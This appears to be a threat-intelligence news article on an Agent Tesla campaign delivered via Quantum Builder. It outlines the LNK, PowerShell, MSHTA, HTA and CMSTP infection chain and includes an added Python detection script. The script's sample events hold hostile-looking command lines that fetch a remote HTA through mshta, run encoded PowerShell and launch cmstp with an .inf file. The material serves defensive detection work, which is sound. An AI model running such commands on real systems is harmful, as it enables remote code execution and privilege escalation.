Researchers have laid bare a campaign spreading Agent Tesla, a popular .NET-based keylogger and RAT. The information stealer is being delivered through Quantum Builder, a malware builder sold on the dark web.

Quantum Builder and Agent Tesla

Researchers from Zscaler revealed that attackers use Quantum Builder to generate the malicious LNK, HTA, and PowerShell payloads that deliver Agent Tesla.
  • The payloads employ techniques such as LOLBins, decoy documents, UAC prompts, and in-memory PowerShell to run the final payload. The builder's developers update these techniques regularly.
  • The HTA file generated by Quantum Builder decrypts PowerShell scripts in memory; these scripts perform a UAC bypass via CMSTP so that the final payload (Agent Tesla) runs with admin rights.

Infection chain

The infection chain starts with a spear-phishing email carrying an LNK file embedded in a GZIP archive.
  • Upon execution, PowerShell code invokes MSHTA to run an HTA file hosted on a remote server.
  • The HTA file decrypts a PowerShell loader script, which in turn performs AES decryption and GZIP decompression to decrypt and load another PowerShell script.
  • The decrypted script is a downloader that first fetches the Agent Tesla binary from a remote server and then executes it with admin privileges by performing a UAC bypass through CMSTP.
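A defender-side check for the chain just described, added here as an example and not code from Zscaler's report or from Cyware: it runs simple process-lineage rules over a handful of constructed Sysmon-style process-creation records (the "parent|image|command line" record format, the IP address, file paths, encoded blob and rule names are all assumptions) and flags PowerShell launching mshta against a remote URL, mshta spawning PowerShell, encoded PowerShell commands, and PowerShell launching cmstp with an .inf file. It goes slightly beyond the article by scoring how many stages of the chain appear together, since several stages on one host are a far stronger signal than any single alert.

```python
"""Detection logic for the LNK -> PowerShell -> MSHTA -> HTA -> PowerShell -> CMSTP
chain, run over constructed process-creation events.

The record format ("ParentImage|Image|CommandLine"), the sample lines, the
address 203.0.113.10, the paths and the rule identifiers are assumptions made
for this example; none of them come from the article."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-cased
    image: str    # image name, lower-cased
    cmdline: str  # full command line as logged


# Constructed sample events: the first four reproduce the described chain,
# the last two are benign noise that must not be flagged.
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|powershell.exe -w hidden -c \"mshta http://203.0.113.10/invoice.hta\"",
    "powershell.exe|mshta.exe|mshta.exe http://203.0.113.10/invoice.hta",
    "mshta.exe|powershell.exe|powershell.exe -nop -w hidden -enc QQBCAEMA",  # constructed blob
    "powershell.exe|cmstp.exe|cmstp.exe /ni /s C:\\Users\\Public\\setup.inf",
    "explorer.exe|powershell.exe|powershell.exe -File C:\\Scripts\\backup.ps1",
    "services.exe|svchost.exe|svchost.exe -k netsvcs",
]

# (rule id, parent-image regex, exact image name, command-line regex)
RULES = [
    ("ps_cmdline_mshta_url",    r".",                "powershell.exe", r"(?i)mshta\s+https?://"),
    ("ps_spawns_mshta_remote",  r"powershell\.exe$", "mshta.exe",      r"(?i)https?://"),
    ("mshta_spawns_powershell", r"mshta\.exe$",      "powershell.exe", r"."),
    ("ps_encoded_command",      r".",                "powershell.exe", r"(?i)(-encodedcommand|-enc)\s+\S"),
    ("ps_spawns_cmstp_inf",     r"powershell\.exe$", "cmstp.exe",      r"(?i)/ni.*\.inf"),
]


def parse_event(line):
    """Split one 'parent|image|command line' record into a ProcEvent."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline)


def match_rules(ev):
    """Return the ids of every rule the event satisfies (parent, image and command line)."""
    hits = []
    for rule_id, parent_re, image, cmd_re in RULES:
        if ev.image == image and re.search(parent_re, ev.parent) and re.search(cmd_re, ev.cmdline):
            hits.append(rule_id)
    return hits


def detect(lines):
    """Return {rule_id: [command lines]} for every event that matched a rule."""
    findings = {}
    for line in lines:
        ev = parse_event(line)
        for rule_id in match_rules(ev):
            findings.setdefault(rule_id, []).append(ev.cmdline)
    return findings


def chain_score(findings):
    """Number of distinct chain stages observed; three or more on one host
    within a short window is a strong signal rather than one noisy alert."""
    return len(findings)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule_id, cmds in found.items():
        print(rule_id, "->", cmds)
    print("chain stages observed:", chain_score(found))
```

In a real deployment the rules would be keyed by host and evaluated over a time window; the point of `chain_score` is that the individual stages (PowerShell calling mshta, an encoded command, cmstp with an .inf) each occur legitimately now and then, but their co-occurrence matches the delivery chain above closely enough to escalate.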

Conclusion

This campaign delivering Agent Tesla is the latest in a list of malware threats that use Quantum Builder to stay undetected. Emotet, Bumblebee, Qbot, and IcedID have previously been spotted adopting the same tactic, and the builder's developers continue to refine it to make their malware more effective.
Cyware Publisher